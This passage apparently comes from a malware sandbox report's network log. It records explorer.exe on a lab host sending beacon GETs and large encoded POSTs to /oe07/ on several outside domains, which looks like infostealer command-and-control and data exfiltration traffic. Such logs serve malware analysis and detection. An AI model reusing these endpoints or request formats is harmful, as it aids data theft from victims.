                                                                                                              Aug 22, 2022 20:07:18.451112032 CEST910OUTData Raw: 68 4c 6d 65 43 72 75 32 58 6d 55 66 7a 75 57 61 37 7a 31 53 6e 58 52 4c 71 67 74 4c 67 58 50 6f 48 53 42 64 65 6d 6f 41 63 53 4c 45 4b 39 54 78 59 74 32 73 32 67 47 34 49 36 75 78 49 69 6d 4f 39 43 75 34 74 75 49 58 70 52 72 30 43 54 79 46 65 2d
                                                                                                              Data Ascii: hLmeCru2XmUfzuWa7z1SnXRLqgtLgXPoHSBdemoAcSLEK9TxYt2s2gG4I6uxIimO9Cu4tuIXpRr0CTyFe-U4GOBdOY1i3cG9sSopME7COYJMD3EZGhqg5HZNekwM0URjX6(D3fDLAQxoMwA2TX7cYIi1(HTDBLKAb651g9HojpU30VJvlXLgenVlUmx7Sdyu89ck97pwX9yhHutlZ7rCrntczdlTExfBXMtfTBjbISkpWU6Op0p
                                                                                                              Aug 22, 2022 20:07:18.465243101 CEST913OUTData Raw: 33 70 56 2d 79 52 39 6c 31 53 30 47 73 69 6a 56 46 55 76 2d 43 4f 46 6b 52 46 72 31 46 4a 39 6f 73 34 46 6d 6a 6e 6a 6f 69 45 38 73 48 59 47 43 4d 48 6e 64 6c 68 54 33 61 5a 64 4a 62 6d 69 35 4a 49 51 49 4f 72 70 39 70 6f 39 36 72 4b 50 67 37 57
                                                                                                              Data Ascii: 3pV-yR9l1S0GsijVFUv-COFkRFr1FJ9os4FmjnjoiE8sHYGCMHndlhT3aZdJbmi5JIQIOrp9po96rKPg7W2ga1uoUSqeCj49Jk(U5BIMYmfMELw6Q3ySaB4D1bxaMd4WiVm4vqOqKAwaliUFYXLZNzPUE305njIgfvtQ4FAg83uTjrtySS3z(Cj-UwGYw341DtEdUwMJSbnZ2u1FBPwEhVaZ3g(j1GSvg8SF1EANa34Pekl4XX0
                                                                                                              Aug 22, 2022 20:07:18.465420008 CEST928OUTData Raw: 44 7a 53 63 4a 4d 71 61 41 6d 37 36 37 48 31 64 6a 55 43 79 6d 43 59 51 63 61 4d 34 4d 45 79 52 70 39 56 48 34 59 50 4a 34 45 4d 4b 4e 4d 41 68 36 54 39 33 6a 49 34 47 6a 47 50 4c 79 4e 46 7a 37 76 30 54 76 6d 57 42 32 48 75 7a 52 5f 52 57 41 30
                                                                                                              Data Ascii: DzScJMqaAm767H1djUCymCYQcaM4MEyRp9VH4YPJ4EMKNMAh6T93jI4GjGPLyNFz7v0TvmWB2HuzR_RWA0xpdZjK544v(80iFBz6x6Rd6f7uRnh-JQOuU-v1SN(_SzBmRRiw5HVZWn(i(wFSUBnlS2(B5vNGM_hrHMn14KuaygOjxJzZZpQLkdhZfy188fCRwlzzHeahPdlhL-T6LEdmnDHJ72iWkieppH5-o7XDPkBhB7Hg0x3
                                                                                                              Aug 22, 2022 20:07:18.465590000 CEST936OUTData Raw: 31 69 35 56 39 48 70 51 76 46 44 6c 4e 70 71 54 78 34 62 52 45 61 39 32 41 67 56 39 44 49 42 5f 35 69 53 74 79 5a 61 48 58 50 44 68 62 67 7e 64 30 37 46 31 4e 30 64 51 62 48 55 67 51 5f 39 32 47 49 42 33 53 38 51 77 45 77 6d 36 74 4f 30 32 30 56
                                                                                                              Data Ascii: 1i5V9HpQvFDlNpqTx4bREa92AgV9DIB_5iStyZaHXPDhbg~d07F1N0dQbHUgQ_92GIB3S8QwEwm6tO020VrltiBFlh3LakgsGahvWb~eio6k0zX3wgTGCbuVbop5KpAc9SCj08aCv50oujMD~xO58k86bMB5Bp7YlOqOAy2U4Fs1hN54SEr9TcOGlcGSJosLks1q1F1JxYZEzdqPu7K1q4Kxvh8B7VHfONSDrblFyh9VgWMZtkp
                                                                                                              Aug 22, 2022 20:07:18.465852976 CEST936INHTTP/1.1 302 Found
                                                                                                              Location: https://dan.com/buy-domain/vivino.app
                                                                                                              Date: Mon, 22 Aug 2022 18:07:18 GMT
                                                                                                              Content-Length: 0
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              13192.168.11.2049799168.206.212.1280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:07:37.103828907 CEST937OUTGET /oe07/?0HQL9628=sLR7Kynk+A1Dhvlq5c1LtQV19otxtN9oy0czYRBh5HIDSu6LN2YXKPz/VtbWvZwWCPAY&lP=z6AX5nfHP HTTP/1.1
                                                                                                              Host: www.erinandroger.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              14192.168.11.2049800168.206.212.1280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:07:39.537555933 CEST942OUTPOST /oe07/ HTTP/1.1
                                                                                                              Host: www.erinandroger.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 245786
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.erinandroger.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.erinandroger.com/oe07/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 30 48 51 4c 39 36 32 38 3d 6b 70 64 42 55 57 44 75 6e 51 5a 4a 36 4f 68 43 32 72 68 55 77 46 64 55 38 35 51 67 69 73 6b 69 6a 6b 38 37 4b 44 38 35 71 55 4d 61 54 36 69 41 63 6d 31 55 45 35 75 66 4f 64 65 32 74 63 67 50 4f 50 4d 48 65 49 54 44 69 48 76 55 7e 50 31 44 74 6c 68 32 45 49 72 59 75 65 57 4a 55 31 74 46 4e 4c 42 41 71 56 28 7a 30 46 59 46 4f 59 33 77 37 65 68 4d 75 48 76 59 70 48 76 4a 45 38 79 4d 50 33 52 5f 50 76 63 65 32 59 35 36 6d 53 67 68 49 74 59 6d 54 41 6e 73 32 6c 4e 34 6f 54 46 71 42 2d 38 79 68 59 71 66 69 54 56 6a 30 66 4d 64 33 6f 37 36 76 46 54 6c 48 43 61 62 65 34 6c 35 43 6d 6f 57 59 56 6f 4d 4b 48 31 77 52 38 51 52 68 56 54 34 33 51 52 36 39 5a 55 46 61 73 6e 6c 42 6b 4d 6a 55 2d 35 30 57 4d 7a 39 55 34 39 71 64 31 52 56 66 43 43 69 6c 61 45 6b 4c 67 39 73 7a 39 33 38 35 5a 6d 49 53 45 72 4e 45 4d 54 53 42 58 57 33 6b 69 56 52 61 6c 57 69 38 54 58 4d 78 36 39 52 64 59 4f 50 41 30 68 4a 58 30 32 46 69 57 79 4c 6f 78 79 6a 55 30 56 47 6b 4b 56 6b 5a 56 64 33 32 54 44 77 6c 65 32 4c 31 39 4f 32 66 61 36 74 4b 47 67 5a 79 5f 6d 64 6c 4c 65 78 74 37 51 79 6a 79 55 71 48 35 78 6c 50 75 38 79 79 77 4a 70 65 4b 4c 75 73 69 35 37 76 75 55 33 71 63 55 4a 4d 36 32 6f 42 6f 71 59 4f 6f 36 37 33 6d 7e 6d 4c 44 52 43 79 37 49 32 4d 51 4d 5a 49 41 7e 4d 73 33 6b 42 65 73 53 64 41 79 36 30 51 42 30 4a 4d 73 34 74 7e 48 71 43 6a 6d 58 31 37 4f 49 54 61 70 32 4d 28 45 43 42 37 65 4d 35 36 4e 54 2d 75 6b 45 37 58 6b 34 77 55 59 4c 44 28 49 67 30 44 7a 30 6e 53 45 70 32 46 45 53 4a 43 52 7e 4d 69 4b 38 38 38 5f 6e 6c 76 38 45 35 72 6c 6f 71 38 35 78 74 37 38 55 6c 31 64 44 43 68 77 6e 61 7a 57 52 74 32 31 4a 4a 28 4a 59 5f 43 63 63 74 57 2d 56 57 6e 50 4c 5a 37 44 49 63 79 6d 6b 50 70 44 38 79 62 36 73 6e 75 39 75 66 6c 4a 6c 47 6c 47 4a 66 6d 43 67 6d 7a 58 30 33 51 49 78 31 72 44 48 64 57 51 57 38 6e 78 65 6f 79 64 49 44 44 35 41 34 75 30 52 6e 6d 42 4d 64 73 30 37 4f 33 65 77 55 79 44 79 6c 30 62 49 73 56 50 79 62 58 70 54 31 36 30 5a 35 72 53 7a 71 65 7a 4c 38 39 6b 76 5f 41 55 74 79 77 72 59 4f 30 49 46 42 39 73 42 69 4a 44 42 4f 48 72 71 67 77 39 37 48 53 5f 73 61 32 4b 54 2d 48 59 49 71 42 76 32 38 59 79 68 37 4e 43 49 5a 59 6d 37 6a 4a 77 53 55 41 64 38 43 44 72 4d 68 39 52 51 74 71 44 35 4f 64 48 30 51 41 42 63 61 64 76 45 43 76 36 6a 51 47 77 57 4b 39 57 51 4e 47 6e 4d 6e 79 63 47 43 6f 39 54 58 6f 54 6d 6a 68 4f 49 42 5a 54 46 75 53 46 33 64 57 62 6e 75 49 48 76 7a 69 36 4f 4b 7a 61 75 41 32 66 52 6e 4b 72 5a 50 62 43 30 6f 41 67 59 75 62 78 4d 68 4d 4f 76 67 76 6d 4f 66 30 43 39 36 76 69 35 71 37 70 54 30 55 5f 30 50 4e 4c 72 67 6f 36 71 34 58 71 66 4f 6b 5a 33 69 7e 4b 72 55 6f 61 70 45 77 35 6e 33 6d 53 67 4e 36 7a 38 6d 4d 6d 6b 55 6a 79 65 58 4f 69 43 5f 62 4f 79 52 75 4a 43 75 58 30 69 57 35 76 55 32 44 67 7a 77 67 72 57 62 66 48 4c 4b 46 54 67 73 4e 69 73 6d 4c 52 53 6c 61 6b 37 6c 61 38 70 31 78 73 75 50 43 52 54 67 6b 33 36 6f 54 4d 68 49 61 45 70 41 4c 78 67 5a 65 6f 4a 75 78 65 37 6e 58 4b 59 4f 51 70 30 57 42 6c 6f 65 6d 72 79 49 4c 42 34 32 38 74 6c 6b 34 5a 5a 47 33 54 77 53 47 32 39 45 71 47 78 72 4b 56 51 50 4f 50 72 5f 50 53 5a 5a 70 72 61 78 64 31 59 46 28 4d 59 45 6d 36 5a 72 69 48 66 61 33 4d 64 64 31 65 56 78 59 52 31 73 75 6e 50 6a 66 49 61 78 31 79 66 6a 7e 4a 62 54 76 41 52 63 54 2d 4f 42 31 78 6d 30 31 55 39 43 7e 49 64 64 35 74 4c 65 4a 34 5a 45 48 47 34 64 59 42 67 6d 31 46 63 79 74 51 6f 56 54 59 55 31 43 2d 51 4e 42 33 57 71 61 73 70 50 76 49 44 5f 4c 58 44 48 64 74 37 6e 67 64 63 62 71 51 69 58 77 38 73 67 39 5a 47 59 76 4a 43 35 58 54 33 7a 34 70 4c 68 6a 7a 44 32 6a 31 38 79 5a 6a 65 78 73 66 70 38 47 73 30 2d 74 64 5a 58 57 52 43 34 61 75 5a 64 4f 2d 68 4d 6e 63 44 54 6d 32 68 7a 5a 51 4f 53 66 6a 42 58 7a 6d 6b 55 74 61 36 69 6f 58 78 6b 4d 5f 28 65 6b 4b 7a 4e 72 42 79 51 6b 4a 74 33 53 49 4a 45 37 6a 65 79 54 51 43 4c 61 6a 56 4e 4e 4e 41 45 28 70 69 41 69 47 43 6b 75 4f 6f 32 6c 4f 38 48 54 6c 64 44 58 46 56 64 71 62 42 35 42 58 44 45 49 72 4e 48 6a 4f 54 73 47 51 73 38 68 54 76 65 50 45 6d 6d 45 5a 65 53 52 77 6b 76 5a 77 4b 33 6a 33 6a 67 39 38 72 70 71 34
                                                                                                              Data Ascii: 0HQL9628=kpdBUWDunQZJ6OhC2rhUwFdU85Qgiskijk87KD85qUMaT6iAcm1UE5ufOde2tcgPOPMHeITDiHvU~P1Dtlh2EIrYueWJU1tFNLBAqV(z0FYFOY3w7ehMuHvYpHvJE8yMP3R_Pvce2Y56mSghItYmTAns2lN4oTFqB-8yhYqfiTVj0fMd3o76vFTlHCabe4l5CmoWYVoMKH1wR8QRhVT43QR69ZUFasnlBkMjU-50WMz9U49qd1RVfCCilaEkLg9sz9385ZmISErNEMTSBXW3kiVRalWi8TXMx69RdYOPA0hJX02FiWyLoxyjU0VGkKVkZVd32TDwle2L19O2fa6tKGgZy_mdlLext7QyjyUqH5xlPu8yywJpeKLusi57vuU3qcUJM62oBoqYOo673m~mLDRCy7I2MQMZIA~Ms3kBesSdAy60QB0JMs4t~HqCjmX17OITap2M(ECB7eM56NT-ukE7Xk4wUYLD(Ig0Dz0nSEp2FESJCR~MiK888_nlv8E5rloq85xt78Ul1dDChwnazWRt21JJ(JY_CcctW-VWnPLZ7DIcymkPpD8yb6snu9uflJlGlGJfmCgmzX03QIx1rDHdWQW8nxeoydIDD5A4u0RnmBMds07O3ewUyDyl0bIsVPybXpT160Z5rSzqezL89kv_AUtywrYO0IFB9sBiJDBOHrqgw97HS_sa2KT-HYIqBv28Yyh7NCIZYm7jJwSUAd8CDrMh9RQtqD5OdH0QABcadvECv6jQGwWK9WQNGnMnycGCo9TXoTmjhOIBZTFuSF3dWbnuIHvzi6OKzauA2fRnKrZPbC0oAgYubxMhMOvgvmOf0C96vi5q7pT0U_0PNLrgo6q4XqfOkZ3i~KrUoapEw5n3mSgN6z8mMmkUjyeXOiC_bOyRuJCuX0iW5vU2DgzwgrWbfHLKFTgsNismLRSlak7la8p1xsuPCRTgk36oTMhIaEpALxgZeoJuxe7nXKYOQp0WBloemryILB428tlk4ZZG3TwSG29EqGxrKVQPOPr_PSZZpraxd1YF(MYEm6ZriHfa3Mdd1eVxYR1sunPjfIax1yfj~JbTvARcT-OB1xm01U9C~Idd5tLeJ4ZEHG4dYBgm1FcytQoVTYU1C-QNB3WqaspPvID_LXDHdt7ngdcbqQiXw8sg9ZGYvJC5XT3z4pLhjzD2j18yZjexsfp8Gs0-tdZXWRC4auZdO-hMncDTm2hzZQOSfjBXzmkUta6ioXxkM_(ekKzNrByQkJt3SIJE7jeyTQCLajVNNNAE(piAiGCkuOo2lO8HTldDXFVdqbB5BXDEIrNHjOTsGQs8hTvePEmmEZeSRwkvZwK3j3jg98rpq4zKEoDmLVb81bYlWNJEv0cmrlUpRAthvPL7MbSpPB48wiN6fE7OQzZK8hI7UE(KKm14q3O2k_fCaL44QOpiJ4lSbib2xDN9sioghDOiVTE55T3fcAKfo-LcDXi5enmHfjrZbwdHgkv20B9eP3TN~cYky1sjbVCqisN-yBFcwSEB69Y34fZQNHsaiEazHOjawoQm(DknpGqAEAG_V9h5UayC9oxTqOEVc0qMtNrAgnFT45QyQfsULiPjuF24sX0g3pezIcGsZ6IwP0IF32Gd6uoMQHT5Ycsku_vJ0ueFk4i6fDLSCKrlrf4BJbSqZrGukYHOvCsKk7wy2CQhv5Liwi~hU-YnkF(raqavJXCgaA1NZIjLOBJ66umCZiNWETgIoIwcBv7SKBrv39(A9cIHwcPcdTY_RR7UFhLM60nd2nOSEF2VJ5be4d6RtCe76xFA42X02NBVBkckYNpSoMmU~dnrlXciXt~N(4Offes7npEQ~7KmihkXDJdCoj7yR7wK3b9B56gb7GEH776bkM7iU_JsrsiKbjMwfU5VKriN9_MEcQfZ1_JWAoXaFRkH6CcFvfQeA7Xq7F4rova6rV8EjnPUm9GjEhldRfjk~jxH8zMws1qHVMxL78eo(UmDp2w8~1Syef1gAC7RNWRgLhf9z0a7EoXHR9wYxtYSTmdBwwjUJDh4(24H31N-(iv87otOD9IokEq30oYwMJ1sfL(5geNW26ktJdQfaBY5JPIinVwGA5lzWM62BtAg5RU1LV4G2AIFGMlh4O~DNM14m_pPNFraGOwTwsK5oPu4sLpTja5ONVjppo9et3(9WXG30_hoj6zJu3K3~pazdqFupOV6fTkRPj0m0FTQPSDpiEGxJH0YZfvfiqnxV8xQuYuDx7P6fdvRuEZ2xybO(N4BgeqXt1eqnHBnYZ(KvC1otP9b37fz00uYpG1YPRo1i1bw(Bwp2O7ISHAObmdQzgD6idz3Ofe4fzepD82gPR53WnwQgPUZnGTollEXNMlBFkCez1xVAAP-L07oNZZV0wNu4oZOflEtFmfAoOrwnLeec7Q1pcfOQ8apNK(l3_ePgUPmSp2mBEJubVXW9bmf6FNYUgeiejp7rXbS41mirQtctkpXWy4wKsgfSTu-K4CSYiZgr7dCjOBiki5ePVrf2qER5NKLngy7tKLgHftSB_RFMS5_K_wAHw(5krxDZzaQSitG~EbFlta_YaJrhFrrZl5lc0SL9DdtYFgIGnfvLfqDdEKpM0NEm223H-vS~shpa-hj0BaiWROwuQ46W-XlPtuX5GcvdWd-mEp-JgDCyCNJig1-q4jxO9XsMA(ChL0MhIkwrFmCFajpGQx1XqTCUIwPhNyNJwsdEGZLt77Gn6YYMjBcU6pZxCUi8Eu7yTmR9lKq~0bAxYWj~5zyWLyeg_Nc0dBwF61nxvCdT_0kPPp89lrUj2zthnvxOEVLGNtznYh1HmuhGnlsTY3aM1wKSfUyCDqJfG7MUqy1BFo5VcoqEJQxGwEurzZX6vqBA8NQqkX-N8lFcd9f1ngliomPxVbGtOehIdacU1(gm9IK2PUIfm6pBChaB4fJ6VLTNfwcTdLPBBI67N3ekwLxCx2VLH57AYH0wrW0agOLmykZJ_~RpzRPIg(vSWnH40v55HS9pWZ6OJ7w~23V4le3qSLTnXeh(Sn7DhTaETHynZ92b2YOLwTrwkjQZkaVmawppIaWKcKbaue8Ex(feItci27A5vyHsWHQxHrZX_PN7iw0Ts(AMKjHFIsFOJ6XBsHFqupvs3iigT02VrGp3QO1NGDkfoGV(aMHASISq7ZDFe8twHWXpJipMb8Dd7xp3SYPVkcH3_TYwqKR6vQU1zxNmvbyIJmvFTdYvbAhqZBFS2DeiGxgq7OJiBG466CxGqm8M_32DcpFUw1RKXGukw8891lKIVPCdrS-T7mrKvlWPlMUZa(cX1OwRbuQRQtH97RJipwmf5zdNZxxxyDsTFcn7ZN1Sfve54~FfagEx3iw19sXNYbz~JFBKR(uVcv7jmL3HD8CpzkIe-v21e4dmTiRJrp8zJCcAYuaFD(Lk0j_SDyl572VPxl6jfEfsejm60jS45sUejb2BX~hwyzcvGvP4QnB9O3YNfuqM1uiYxPCW1YiOegHCGJQCSp5nBiAEvEdKyHtfPlEZTeCDOYgaVmmRAi-V0qnSAzmLM2dzfNF5dl2aaDnNoEn7006yiNML6~BWasctMdD6aO8KDuVX1
                                                                                                              Aug 22, 2022 20:07:39.537640095 CEST951OUTData Raw: 46 4e 77 76 33 6f 77 45 46 6a 6b 77 55 4b 73 6a 53 36 7e 39 63 7a 44 66 66 67 7a 32 53 63 56 35 49 78 31 65 76 64 4d 35 56 43 4a 5a 50 4f 6f 6e 30 61 35 42 45 35 7e 58 66 64 66 64 6c 31 4c 77 61 68 53 42 32 52 4a 74 78 6d 71 53 4c 55 6b 50 53 35
                                                                                                              Data Ascii: FNwv3owEFjkwUKsjS6~9czDffgz2ScV5Ix1evdM5VCJZPOon0a5BE5~Xfdfdl1LwahSB2RJtxmqSLUkPS5umE5USYRNTDvqGTbkj8YC1wMpAA9pkfuCE6QJDMHLK1a(Mx0G-Szs9TStcF6y9qyDK6gfhsAz5BcAP9iMHsKtP~bQGs69gySx-WmLKOmNdi1VqZYtO6LILKcJQf2O1K_QdSPw1L3bY(LIUswbgtkjlcE5x4LFm4PB
                                                                                                              Aug 22, 2022 20:07:39.752435923 CEST954OUTData Raw: 55 42 28 39 6e 4e 6f 2d 38 66 79 48 43 6f 63 74 33 33 48 32 72 61 41 36 53 76 51 7a 47 79 50 64 28 5a 30 67 7e 61 6b 44 47 63 6a 35 6a 64 44 35 71 4b 79 58 48 32 6c 45 36 54 47 41 66 7a 33 33 59 78 71 35 42 35 30 66 59 32 6e 53 34 6f 62 58 6b 54
                                                                                                              Data Ascii: UB(9nNo-8fyHCoct33H2raA6SvQzGyPd(Z0g~akDGcj5jdD5qKyXH2lE6TGAfz33Yxq5B50fY2nS4obXkThC5CsyDZBoNd6j2hHFBEVI8s6SlsXQlehRDVNziL~5y5X0CnAlDSjJU_hWufhSKhao8aQcwDTB4xEgVHj4Ew2rvvvLBjBMzy7ub-bSCMBCAFPYpD3HMO47Xi6ZQBlkiR(7hxhJ77zlursALfcb8Xigh7D4vPuWmdy
                                                                                                              Aug 22, 2022 20:07:39.752557039 CEST959OUTData Raw: 61 48 79 75 73 4f 56 72 47 54 75 54 63 59 64 78 36 53 6d 56 6b 71 33 5a 46 72 6b 65 62 33 74 5a 58 70 4d 4b 43 43 52 36 74 45 41 61 4c 47 37 53 56 62 61 34 6e 6f 4f 6b 6f 48 38 39 46 43 6f 76 31 36 6a 35 54 55 74 37 71 61 72 75 36 77 45 59 50 2d
                                                                                                              Data Ascii: aHyusOVrGTuTcYdx6SmVkq3ZFrkeb3tZXpMKCCR6tEAaLG7SVba4noOkoH89FCov16j5TUt7qaru6wEYP-9SSYAjtKENQKg-xcj4hLEGGNnSXG8pFduu1ZQAf0Bl2VbW0cSZ1CRTQ-yTrhFMwP7vr22pcFgjzef-oJd_tgHNiXxApwh8nf~Ddf7Yw96WgUWXg9Rkif3DFt7EBS4NmIlWU36itL7csqMXD-(_rbfmup1dC2ZJCB4
                                                                                                              Aug 22, 2022 20:07:39.752733946 CEST964OUTData Raw: 70 36 36 52 48 61 6f 4b 38 54 74 5f 35 73 54 51 4a 6a 4b 37 74 48 6f 7a 71 30 58 61 43 57 63 62 6b 73 54 30 34 71 78 39 56 35 48 45 64 46 34 2d 34 45 53 64 31 76 59 66 30 48 4a 31 4b 4d 6f 45 6f 6c 6f 50 6a 4a 64 6e 4b 6f 53 31 61 6f 6f 50 7e 50
                                                                                                              Data Ascii: p66RHaoK8Tt_5sTQJjK7tHozq0XaCWcbksT04qx9V5HEdF4-4ESd1vYf0HJ1KMoEoloPjJdnKoS1aooP~PzpyokBLXgW~RuCM5cPtcys2WLaDviy6nZNOlgXdFbyOw7OYxLoLAyqcz7Zt9yGev0E21lYY0J0y46XBPLY7TRbQxFf(VRqklbzMVaORz9ZgM4TkZ(jmuP8qu0LBOVewPsf0vyEq20chywGXlN50Qy2ETeXVM7iWyt
                                                                                                              Aug 22, 2022 20:07:39.753089905 CEST968OUTData Raw: 5a 35 62 6b 56 69 67 57 70 6f 28 75 66 7a 4c 38 69 75 71 56 35 30 70 55 74 6c 66 67 30 31 7a 62 46 61 4e 52 56 46 4c 50 64 71 4d 5a 62 39 30 46 50 43 58 77 67 78 4a 43 7e 6f 72 58 68 67 6d 54 77 38 38 4e 75 4d 46 53 54 2d 68 53 4b 73 6b 45 61 42
                                                                                                              Data Ascii: Z5bkVigWpo(ufzL8iuqV50pUtlfg01zbFaNRVFLPdqMZb90FPCXwgxJC~orXhgmTw88NuMFST-hSKskEaBR_zc275PB5j5NhGAk9X5JaQAJkCcBpA6MqwUQr3ScqgEB3u2InCHh4hf19w2elsjpOuh(3i9yV4KpMjsysAGCiWhCNWnbZhaDyMuGpDFdLoDRZ~mZWK9Pi~qk5ROvSww~bbvS0v_whv_dyeXSN8dxZpVkJtM3L5_h
                                                                                                              Aug 22, 2022 20:07:39.753268957 CEST975OUTData Raw: 57 76 65 67 59 42 41 35 34 6f 69 71 75 4b 30 33 79 53 71 67 47 6c 31 56 51 4d 36 63 30 70 68 43 55 52 47 5f 33 4f 58 30 45 4e 59 4a 45 4e 75 79 46 33 54 70 4d 33 47 73 67 4f 44 31 37 67 4b 65 45 6c 42 73 56 4f 42 4c 49 43 28 30 34 71 4f 45 66 33
                                                                                                              Data Ascii: WvegYBA54oiquK03ySqgGl1VQM6c0phCURG_3OX0ENYJENuyF3TpM3GsgOD17gKeElBsVOBLIC(04qOEf3EsRES2S_L05N4ernhSGO2Pa9EMyxrtnCrMmPmBdZ(Kq72CDpdy~T2Nh8OZN8vA7KcR1ZD1k9DfowFz2euTOpqmkCZkK7KBEKaqe3SdURxLFLG383or7aIcaa2SgGOl6-7gvwmPH9UkRih3rUxIT9tyaNm9iAkUmtA
                                                                                                              Aug 22, 2022 20:07:39.753442049 CEST978OUTData Raw: 6d 5a 43 35 37 55 77 35 63 64 65 4f 7e 41 78 31 52 57 35 46 66 74 78 66 34 39 63 38 5a 45 44 46 76 42 56 36 57 47 70 43 30 70 63 56 31 41 4b 6e 6a 79 57 46 58 4c 64 33 42 33 79 77 7e 47 38 30 6f 61 5a 5f 50 50 44 31 6e 65 74 76 6b 4b 42 43 64 72
                                                                                                              Data Ascii: mZC57Uw5cdeO~Ax1RW5Fftxf49c8ZEDFvBV6WGpC0pcV1AKnjyWFXLd3B3yw~G80oaZ_PPD1netvkKBCdrI0p0UF1EJH9MqbBnJMH6Rl8WUEGw3KTiNc7sjEHX6P63gjJbDYGC5Y0TUcBA71tIAdEoW4B8(LtxiNsuyGZ91mDidaHYB05kJZYSfLTCGh1zGJcWuB7rmgGGHXiD10NxseRiajY9pXY_uKXJpulsSIWk~J5l9z7oV


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              15192.168.11.2049801154.83.27.10280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:07:57.832189083 CEST979OUTGET /oe07/?lP=z6AX5nfHP&0HQL9628=66zN2ANa36y2SQxhNXKo0SAKr+1fbVR3z5i//1ienxLdBVM2rHrI4b7mKnIyPmnq8yDA HTTP/1.1
                                                                                                              Host: www.www55275.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Aug 22, 2022 20:07:57.990148067 CEST980INHTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                              Date: Mon, 22 Aug 2022 18:06:28 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 1163
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 